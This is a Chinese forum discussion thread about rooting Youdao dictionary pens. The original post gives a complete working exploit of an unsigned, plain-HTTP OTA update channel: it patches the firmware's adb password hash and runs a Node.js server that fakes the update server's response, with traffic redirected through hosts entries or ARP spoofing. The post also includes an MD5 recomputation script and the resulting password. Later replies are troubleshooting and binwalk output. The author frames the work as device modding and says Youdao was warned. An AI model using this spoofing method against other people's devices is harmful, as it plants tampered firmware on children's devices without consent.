记录有道词典笔S6（词典笔OS）获取adb权限

[SkySight-666]

原帖 : #249
问题已向网易反馈二次，均没有得到处理
该方法理论上有道全系通用

声明

#202 #178
本方法总结了上面两个帖子的讨论内容，感谢各位大佬提供的思路。

免责：使用本方法以及本方法获取的权限造成的一切后果，如远程施法、有道律师函、词典笔损坏、家长批评、第三次世界大战.. 与作者无关。

此漏洞十分危险，无论你是否想要给词典笔提权，都请做到：不在陌生的网络环境更新系统、警惕莫名奇妙的系统更新、关闭更新包自动下载 , 以及不要利用此漏洞攻击别人的设备。

原理

通过抓包可以分析，有道的OTA更新使用的是不安全的HTTP，以及更新镜像的MD5是返回在POST请求中的。同时，通过逆向抓包下载到的全量固件，发现有道的词典笔OS并没有做必要的系统更新签名校验。故我们可以修改一个全量包，修改其中adb_auth.sh 中的 sha256 值来实现修改密码，再通过规则转发来让词典笔更新我们自己的镜像。

实现

• 首先，通过抓包抓取系统全量包
• 使用 binwalk 拆解全量包，得到原始adb密码的sha256值
• 使用 sed -i 命令替换sha256值
• 检查新镜像的大小，确保一致
• 重新按照POST请求返回中的MD5分段重新计算分段MD5和新的整包MD5
• 取得新镜像的文件直链
• 创建 nodejs 服务器，修改返回值
• 修改系统hosts文件，将 iotapi.abupdate.com 重定向到你的欺骗服务器
• 在词典笔上先检查一次更新
• 使用Windows热点连接词典笔，或者使用arp欺骗攻击
• 再次检查更新，更新新的系统镜像
• 连接adb

相关资源（适用有道词典笔S6）

使用的node js脚本 (记得修改镜像直链)

const http = require('http');
const fs = require('fs');
const path = require('path');
const port = 80;

// 假设这是你的自定义 JSON 数据
const JsonData = {
    "releaseNotes": {
        "publishDate": "2023-11-18",
        "version": "4.0.2",
        "content": "[{\"country\":\"zh_CN\",\"content\":\"1、修复部分问题，优化系统稳定性\"}]"
    },
    "safe": {
        "isEncrypt": 0
    },
    "version": {
        "segmentMd5": "[{\"num\":0,\"startpos\":0,\"md5\":\"11ca35db346f49135324020d8ed9969b\",\"endpos\":104857600},{\"num\":1,\"startpos\":104857600,\"md5\":\"3c05419707b6981093fb6ed50a92a095\",\"endpos\":209715200},{\"num\":2,\"startpos\":209715200,\"md5\":\"eea450e348bd4f36c8abe28b8eda0a6d\",\"endpos\":314572800},{\"num\":3,\"startpos\":314572800,\"md5\":\"36dcce0dfda04040c87dc5fdbe53039e\",\"endpos\":419430400},{\"num\":4,\"startpos\":419430400,\"md5\":\"147f9c36c8353e514305f2917182ef35\",\"endpos\":524288000},{\"num\":5,\"startpos\":524288000,\"md5\":\"d1f1733a399d92c10b5723d4fc86747f\",\"endpos\":629145600},{\"num\":6,\"startpos\":629145600,\"md5\":\"ca1e07d0e986145cbf8e97113d8588f4\",\"endpos\":734003200},{\"num\":7,\"startpos\":734003200,\"md5\":\"21b0dcf16b91120ac79a2337ddd741f8\",\"endpos\":838860800},{\"num\":8,\"startpos\":838860800,\"md5\":\"2f282b84e7e608d5852449ed940bfc51\",\"endpos\":943718400},{\"num\":9,\"startpos\":943718400,\"md5\":\"4b5e89f2ed4c7ba70269e1c67257a480\",\"endpos\":1048576000},{\"num\":10,\"startpos\":1048576000,\"md5\":\"2f282b84e7e608d5852449ed940bfc51\",\"endpos\":1153433600},{\"num\":11,\"startpos\":1153433600,\"md5\":\"2f282b84e7e608d5852449ed940bfc51\",\"endpos\":1258291200},{\"num\":12,\"startpos\":1258291200,\"md5\":\"bdc427a4857dd06b1eef994e454077ae\",\"endpos\":1363148800},{\"num\":13,\"startpos\":1363148800,\"md5\":\"47366679b58ec4436205a40e8cf3ac7e\",\"endpos\":1397096460}]",
        "bakUrl": "填写你自己的镜像直链",
        "versionAlias": "",
        "deltaUrl": "填写你自己的镜像直链",
        "deltaID": "9457867",
        "fileSize": 1397096460,
        "md5sum": "1d4ce19a13629aa9d72499012d4046e9",
        "versionName": "99.99.91"
    },
    "policy": {
        "download": [
            {
                "key_name": "wifi",
                "key_message": "仅wifi下载",
                "key_value": "optional"
            },
            {
                "key_name": "storageSize",
                "key_message": "存储空间不足",
                "key_value": "76944507"
            },
            {
                "key_name": "forceDownload",
                "key_message": "",
                "key_value": "false"
            }
        ],
        "install": [
            {
                "key_name": "battery",
                "key_message": "电量不足，请充电后重试！",
                "key_value": "30"
            },
            {
                "key_name": "voltage",
                "key_message": "",
                "key_value": ""
            },
            {
                "key_name": "rebootUpgrade",
                "key_message": "",
                "key_value": "false"
            },
            {
                "key_name": "force",
                "key_message": "",
                "key_value": "{\"from\": \"00:00\", \"to\": \"00:00\",\"gap\": \"00:00\"}"
            }
        ],
        "check": [
            {
                "key_name": "cycle",
                "key_message": "",
                "key_value": "1500"
            },
            {
                "key_name": "remind",
                "key_message": "",
                "key_value": "1440"
            }
        ]
    }
};


// 获取当前日期，并格式化为 HTTP 头所需的格式
const getFormattedDate = () => {
    const now = new Date();
    return now.toUTCString(); // 转换为 UTC 格式
};

// 创建 HTTP 服务器
const server = http.createServer((req, res) => {
    console.log(`${req.method} request for ${req.url} at ${new Date().toISOString()}`);

    if (req.method === 'GET' && req.url === '/product/1687249911/e3025e518840fce8/ota/checkVersion') {
        // 设置自定义头部
        res.writeHead(200, {
            'Server': 'nginx/1.20.1',
            'Content-Type': 'application/json;charset=UTF-8',
            'Date': getFormattedDate(), // 使用当前日期
            'Transfer-Encoding': 'chunked',
            'Connection': 'close'
        });
        // 发送 JSON 数据
        res.write(JSON.stringify({
            status: 1000,
            msg: 'success',
            data: JsonData
        }));
        res.end(); // 结束响应
    } else if (req.method === 'POST' && req.url === '/product/1687249911/e3025e518840fce8/ota/checkVersion') {
        // 设置自定义头部
        res.writeHead(200, {
            'Server': 'nginx/1.20.1',
            'Content-Type': 'application/json;charset=UTF-8',
            'Date': getFormattedDate(), // 使用当前日期
            'Transfer-Encoding': 'chunked',
            'Connection': 'close'
        });
        // 发送 JSON 数据
        res.write(JSON.stringify({
            status: 1000,
            msg: 'success',
            data: JsonData
        }));
        res.end(); // 结束响应
    } 
    else {
        // 处理其他请求
        res.writeHead(404, { 'Content-Type': 'text/plain' });
        res.end('Not Found');
    }
});

// 启动服务器
server.listen(port, () => {
    console.log(`Server is running at http://localhost:${port}`);
});

使用的修改后的全量包（与上面的脚本中的MD5值匹配）

123盘链接

使用的分段md5计算脚本

import hashlib

def calculate_partial_md5(file_path, start, end):
    # Initialize the MD5 hasher
    md5 = hashlib.md5()
    
    # Open the file in binary read mode
    with open(file_path, 'rb') as f:
        f.seek(start)  # Move the file pointer to the start position
        chunk = f.read(end - start)  # Read the specified chunk of the file
        md5.update(chunk)  # Update the MD5 hasher with the chunk
    
    # Return the hexadecimal MD5 hash
    return md5.hexdigest()

# Usage example
file_path = ''
start_byte =  # Specify the start byte
end_byte =   # Specify the end byte

partial_md5 = calculate_partial_md5(file_path, start_byte, end_byte)
print(f"Partial MD5 hash: {partial_md5}")

成功后，adb密码将修改为 YDPenS6

[Shapaper233]

大佬,理论上A6支持吗

[SkySight-666]

抓个包看看，保险的话再拆个包看看有没校验
理论通用

[SkySight-666]

123盘貌似ban掉了大文件下载，过段时间换个网盘逝逝

[wyxdlz54188]

大佬在吗，我有A6Pro的包可以帮我看下吗.
顺便给我一个完整一点的教程呗

[SkySight-666]

全量包？（修改版本99.99.90）

[wyxdlz54188]

那就对了新版本的好小啊，怎么打包img一直报错

…

---原始邮件--- 发件人: ***@***.***> 发送时间: 2024年10月29日(周二) 凌晨0:20 收件人: ***@***.***>; 抄送: ***@***.******@***.***>; 主题: Re: [PenUniverse/PenMods-release] 记录有道词典笔S6（词典笔OS）获取adb权限 (Discussion #250) 全量包？（修改版本99.99.90） — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you commented.Message ID: ***@***.***>

[YCTS-otree]

有没有S6pro的密码？

[FunnyBishop]

[wyxdlz54188]

查看最近几个问题，我有发QQ号，我这有这位漏洞大佬的QQ，我有解压方法

[wyxdlz54188]

查看最近几个问题，我有发QQ号，我这有这位漏洞大佬的QQ，我有解压方法

…

---原始邮件--- 发件人: ***@***.***> 发送时间: 2024年11月15日(周五) 晚上9:00 收件人: ***@***.***>; 抄送: ***@***.******@***.***>; 主题: Re: [PenUniverse/PenMods-release] 记录有道词典笔S6（词典笔OS）获取adb权限 (Discussion #250) `我抓到了X7的全量包，但是binwalk解析结果不正常,大概是这样,我怀疑加过密，请问大佬们有什么想法吗： WARNING: Extractor.execute failed to run external extractor 'tsk_recover -i raw -f ext -a -v '%e' 'ext-root'': [WinError 2] 系统找不到指定的文件。, 'tsk_recover -i raw -f ext -a -v '%e' 'ext-root'' might not be installed correctly WARNING: Extractor.execute failed to run external extractor 'mkdir 'ext-root' && mount '%e' 'ext-root'': [WinError 2] 系统找不到指定的文件。, 'mkdir 'ext-root' && mount '%e' 'ext-root'' might not be installed correctly 733734 0xB3226 Linux EXT filesystem, blocks count: 6144, image size: 6291456, rev 1.0, ext4 filesystem data, UUID=cef7bda5-d2ef-4d91-a0c5-4854f8e0f8e0, volume name "install" 7025190 0x6B3226 Flattened device tree, size: 2048 bytes, version: 17 7572858 0x738D7A CRC32 polynomial table, little endian 7602159 0x73FFEF Android bootimg, kernel size: 1919249152 bytes, kernel addr: 0x5F6C656E, ramdisk size: 1919181921 bytes, ramdisk addr: 0x5700635F, product name: "" 7994918 0x79FE26 Flattened device tree, size: 7635 bytes, version: 17 9122342 0x8B3226 Flattened device tree, size: 2048 bytes, version: 17 9670010 0x938D7A CRC32 polynomial table, little endian 9699311 0x93FFEF Android bootimg, kernel size: 1919249152 bytes, kernel addr: 0x5F6C656E, ramdisk size: 1919181921 bytes, ramdisk addr: 0x5700635F, product name: "" 10092070 0x99FE26 Flattened device tree, size: 7635 bytes, version: 17 11219494 0xAB3226 Flattened device tree, size: 1536 bytes, version: 17 11221542 0xAB3A26 Flattened device tree, size: 61467 bytes, version: 17 11283494 0xAC2C26 Linux kernel ARM64 image, load offset: 0x0, image size: 10420224 bytes, little endian, 4k page size, 16813094 0x1008C26 ELF, 64-bit LSB shared object, version 1 (SYSV) 16951142 0x102A766 CRC32 polynomial table, little endian WARNING: Extractor.execute failed to run external extractor 'lzop -f -d '%e'': [WinError 2] 系统找不到指定的文件。, 'lzop -f -d '%e'' might not be installed correctly 16968378 0x102EABA LZO compressed data 17108757 0x1050F15 Intel x86 or x64 microcode, pf_mask 0x01, 1E30-04-01, rev 0x33425800, size 67182128 17108781 0x1050F2D Intel x86 or x64 microcode, pf_mask 0x01, 1E30-04-01, rev 0x33585200, size 67182128 17108805 0x1050F45 Intel x86 or x64 microcode, pf_mask 0x01, 1E30-04-01, rev 0x33584200, size 67182128 17108829 0x1050F5D Intel x86 or x64 microcode, pf_mask 0x101, 1E30-04-01, rev 0x33524100, size 67182128 17275752 0x1079B68 Intel x86 or x64 microcode, pf_mask 0x2000000, 2000-10-08, rev 0x0100, size 256 17276032 0x1079C80 Intel x86 or x64 microcode, pf_mask 0x2000000, 2000-10-08, rev 0x0100, size 256 17362876 0x108EFBC Intel x86 or x64 microcode, pf_mask 0x8000, 2000-01-20, size 18882560 17391103 0x1095DFF Neighborly text, "neighbor dump requestp request" 17391154 0x1095E32 Neighborly text, "neighbor dump request request" 17391204 0x1095E64 Neighborly text, "neighbor dump request" 17391495 0x1095F87 Neighborly text, "neighbor dump requestnvalid values in header for neighbor get request" 17391536 0x1095FB0 Neighborly text, "neighbor get requestrequest" 17391586 0x1095FE2 Neighborly text, "neighbor get requestequest" 17391635 0x1096013 Neighborly text, "neighbor get requestget request" 17391689 0x1096049 Neighborly text, "neighbor get requestquest" 17391737 0x1096079 Neighborly text, "neighbor get requestest" 17391783 0x10960A7 Neighborly text, "neighbor get requestheader for neighbor table dump request" 17391857 0x10960F1 Neighborly text, "neighbor table dump requestor table dump request" 17391914 0x109612A Neighborly text, "neighbor table dump requestor table dump request" 17391971 0x1096163 Neighborly text, "neighbor table dump request" 17392601 0x10963D9 Neighborly text, "Neighbor entry is now deadaddress not specified" 18029567 0x1131BFF Unix path: /dev/vc/0 WARNING: Extractor.execute failed to run external extractor '7z e -y '%e'': [WinError 2] 系统找不到指定的文件。, '7z e -y '%e'' might not be installed correctly 18076735 0x113D43F xz compressed data 18173515 0x1154E4B Unix path: /sys/kernel/debug/dri. 18210279 0x115DDE7 Unix path: /lib/firmware/updates/5.10.160 18325524 0x117A014 Copyright string: "Copyright(c) Pierre Ossman" 18351125 0x1180415 Unix path: /sys/firmware/devicetree/base 18352651 0x1180A0B Unix path: /sys/firmware/fdt': CRC check failed 18367982 0x11845EE Unix path: /sys/kernel/debug/%s 18368036 0x1184624 Unix path: /sys/kernel/debug/%pd/%s 18368085 0x1184655 Unix path: /sys/kernel/debug/%pd/%s 18390138 0x1189C7A Neighborly text, "neighbor table overflow!it" 19077838 0x1231ACE ASCII cpio archive (SVR4 with no CRC), file name: "dev", file name length: "0x00000004", file size: "0x00000000" 19077954 0x1231B42 ASCII cpio archive (SVR4 with no CRC), file name: "dev/console", file name length: "0x0000000C", file size: "0x00000000" 19078078 0x1231BBE ASCII cpio archive (SVR4 with no CRC), file name: "root", file name length: "0x00000005", file size: "0x00000000" 19078194 0x1231C32 ASCII cpio archive (SVR4 with no CRC), file name: "TRAILER!!!", file name length: "0x0000000B", file size: "0x00000000" 19968422 0x130B1A6 AES S-Box 19968678 0x130B2A6 AES Inverse S-Box 21225214 0x143DEFE MySQL MISAM index file Version 3 21229037 0x143EDED MySQL MISAM index file Version 3 21231213 0x143F66D MySQL MISAM index file Version 1 21232294 0x143FAA6 MySQL MISAM index file Version 3 21233023 0x143FD7F MySQL ISAM index file Version 1 21235814 0x1440866 MySQL MISAM index file Version 3 21237258 0x1440E0A MySQL MISAM index file Version 3 21237588 0x1440F54 MySQL MISAM compressed data file Version 2 21239157 0x1441575 MySQL ISAM index file Version 1 21243234 0x1442562 MySQL ISAM index file Version 1 21244803 0x1442B83 MySQL MISAM index file Version 3 21245133 0x1442CCD MySQL MISAM compressed data file Version 2 21254659 0x1445203 MySQL ISAM index file Version 1 21257013 0x1445B35 MySQL ISAM compressed data file Version 3 21260717 0x14469AD MySQL MISAM index file Version 3 21260796 0x14469FC MySQL MISAM index file Version 3 21260886 0x1446A56 MySQL MISAM index file Version 3 21263339 0x14473EB MySQL MISAM index file Version 2 21263931 0x144763B MySQL MISAM index file Version 3 21264714 0x144794A MySQL MISAM index file Version 3 21267572 0x1448474 MySQL ISAM index file Version 1 21269396 0x1448B94 MySQL ISAM index file Version 1 21271996 0x14495BC MySQL MISAM index file Version 3 21275800 0x144A498 MySQL MISAM index file Version 1 21276304 0x144A690 MySQL MISAM index file Version 3 21278370 0x144AEA2 MySQL ISAM compressed data file Version 1 21280048 0x144B530 MySQL MISAM index file Version 3 21280502 0x144B6F6 MySQL MISAM index file Version 3 21282990 0x144C0AE MySQL MISAM index file Version 3 21285333 0x144C9D5 MySQL MISAM index file Version 3 21285633 0x144CB01 MySQL MISAM index file Version 3 21285677 0x144CB2D MySQL MISAM index file Version 3 21286956 0x144D02C MySQL MISAM index file Version 3 21287586 0x144D2A2 MySQL MISAM index file Version 3 21288582 0x144D686 MySQL MISAM index file Version 3 21459704 0x14772F8 Unix path: /sys/kernel/userdata/need_fsck ]; then 21460192 0x14774E0 Unix path: /sys/devices/platform/ff730000.saradc/iio:device0/in_voltage2_raw) WARNING: Extractor.execute failed to run external extractor 'unzip -P '' -o '%e'': [WinError 2] 系统找不到指定的文件。, 'unzip -P '' -o '%e'' might not be installed correctly WARNING: Extractor.execute failed to run external extractor 'jar xvf '%e'': [WinError 2] 系统找不到指定的文件。, 'jar xvf '%e'' might not be installed correctly WARNING: Extractor.execute failed to run external extractor '7z x -y '%e' -p ''': [WinError 2] 系统找不到指定的文件。, '7z x -y '%e' -p ''' might not be installed correctly 21687317 0x14AEC15 Zip archive data, at least v2.0 to extract, name: Author.js.bin 21689300 0x14AF3D4 Zip archive data, at least v2.0 to extract, compressed size: 309741896, uncompressed size: -2127820442, name: 338399091 0x142B8F73 Zlib compressed data, default compression 344853656 0x148E0C98 Zlib compressed data, default compression 349266474 0x14D1622A Zlib compressed data, default compression 349301299 0x14D1EA33 Zlib compressed data, default compression 367619338 0x15E96D0A Zip archive data, at least v2.0 to extract, name: ApolloSelectUnit-cfe84ccd.js.bin 367703720 0x15EAB6A8 Zip archive data, at least v2.0 to extract, name: explainKeypoints.js.bin 370236217 0x16115B39 bix header, header size: 64 bytes, header CRC: 0x9E40CBFE, created: 2088-09-08 20:25:53, image size: 1172315904 bytes, Data Address: 0x134BF8FF, Entry Point: 0x44238280, data CRC: 0x2906069E, OS: RTEMS, image name: "" 370267050 0x1611D3AA MySQL ISAM compressed data file Version 1 370692062 0x16184FDE Zip archive data, at least v2.0 to extract, name: manifest.json 370787376 0x1619C430 Zip archive data, at least v2.0 to extract, name: libs/arm64-orange/libbusiness_history.so 370897552 0x161B7290 Unix path: /dev/dri/card0 372321168 0x16312B90 Unix path: /sys/bus/platform/drivers/led_control/led_control/hall_down — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you commented.Message ID: ***@***.***>

[7963CN]

大佬，我有个X6 Pro的设备想复刻这个方法尝试下，但是有问题，请问如何联系你

[LittleSadSheep]

[LittleSadSheep]

adb连接成功了，感谢各位大佬的解答！

[Shapaper233]

adb连接成功了，感谢各位大佬的解答！

大佬方便做一个完整的教程吗，比如说在discussions里发一个专门的教程帖？我这边是A6 Pro,应该方法差不多，但是我对这些抓包啥的都不太懂。

[Shapaper233]

但是升级完和没升级似乎看起来差别不大，就连版本号都没有变，adb也检测不到有设备接入，这是正常的吗（

这是正常的 你连接adb试试？

问个题外话，理论上连上adb后能不能修改词典笔的翻译数据库，然后给他添加条目存一些文本信息，扫描到这个单词就弹出预制的文本

[LittleSadSheep]

adb连接成功了，感谢各位大佬的解答！

大佬方便做一个完整的教程吗，比如说在discussions里发一个专门的教程帖？我这边是A6 Pro,应该方法差不多，但是我对这些抓包啥的都不太懂。

嗯嗯，过段时间我看看有没有空我写一个

[LittleSadSheep]

但是升级完和没升级似乎看起来差别不大，就连版本号都没有变，adb也检测不到有设备接入，这是正常的吗（

这是正常的 你连接adb试试？

问个题外话，理论上连上adb后能不能修改词典笔的翻译数据库，然后给他添加条目存一些文本信息，扫描到这个单词就弹出预制的文本

还没怎么翻过里面的文件，后面我找个时间折腾折腾

[FunnyBishop]

我抓了个X7词典笔的包，但是binwalk找不到文件，我分享个链接大佬们看看通过百度网盘分享的文件：4b786705-9130-418c-9508-34ffa7f127a...
链接：https://pan.baidu.com/s/1uk_9xI7WE6MSn5WBhsf-Wg
提取码：3dkz

[LittleSadSheep]

binwalk -e \xxxxxxxxxxxx.bin

[FunnyBishop]

我使用了

binwalk -e xxx.img

但是它直接输出了>=70G的文件，而且没有找到有关 adb_auth.sh的文件，只有一堆图片，后面改用foremost，文件大小正常了，但是依然找不到文件

[SkySight-666]

某些版本听说binwalk没用 用DNA试试

…

________________________________ 发件人: FunnyBishop ***@***.***> 发送时间: 2024年11月17日 18:21 收件人: PenUniverse/PenMods-release ***@***.***> 抄送: Juruo ***@***.***>; Author ***@***.***> 主题: Re: [PenUniverse/PenMods-release] 记录有道词典笔S6（词典笔OS）获取adb权限 (Discussion #250) 我使用了 binwalk -e xxx.img 但是它直接输出了>=70G的文件，而且没有找到有关 adb_auth.sh的文件，只有一堆图片，后面改用foremost，文件大小正常了，但是依然找不到文件 ― Reply to this email directly, view it on GitHub<#250 (reply in thread)>, or unsubscribe<https://github.com/notifications/unsubscribe-auth/A2KXNXCNQ76SJQIVYTYAVDT2BBUZVAVCNFSM6AAAAABN3CBZNCVHI2DSMVQWIX3LMV43URDJONRXK43TNFXW4Q3PNVWWK3TUHMYTCMRYGI2TMNQ>. You are receiving this because you authored the thread.Message ID: ***@***.***>

[wyxdlz54188]

这是事实（不是听说），我发现的rootfs需要挂载或者DNA才能解压

…

---原始邮件--- 发件人: ***@***.***&gt; 发送时间: 2024年11月17日(周日) 晚上7:24 收件人: ***@***.***&gt;; 抄送: ***@***.******@***.***&gt;; 主题: Re: [PenUniverse/PenMods-release] 记录有道词典笔S6（词典笔OS）获取adb权限 (Discussion #250) 某些版本听说binwalk没用 用DNA试试 ________________________________ 发件人: FunnyBishop ***@***.***&gt; 发送时间: 2024年11月17日 18:21 收件人: PenUniverse/PenMods-release ***@***.***&gt; 抄送: Juruo ***@***.***&gt;; Author ***@***.***&gt; 主题: Re: [PenUniverse/PenMods-release] 记录有道词典笔S6（词典笔OS）获取adb权限 (Discussion #250) 我使用了 binwalk -e xxx.img 但是它直接输出了&gt;=70G的文件，而且没有找到有关 adb_auth.sh的文件，只有一堆图片，后面改用foremost，文件大小正常了，但是依然找不到文件 ― Reply to this email directly, view it on GitHub<#250 (reply in thread)&gt;, or unsubscribe<https://github.com/notifications/unsubscribe-auth/A2KXNXCNQ76SJQIVYTYAVDT2BBUZVAVCNFSM6AAAAABN3CBZNCVHI2DSMVQWIX3LMV43URDJONRXK43TNFXW4Q3PNVWWK3TUHMYTCMRYGI2TMNQ&gt;. You are receiving this because you authored the thread.Message ID: ***@***.***&gt; — Reply to this email directly, view it on GitHub, or unsubscribe. You are receiving this because you commented.Message ID: ***@***.***&gt;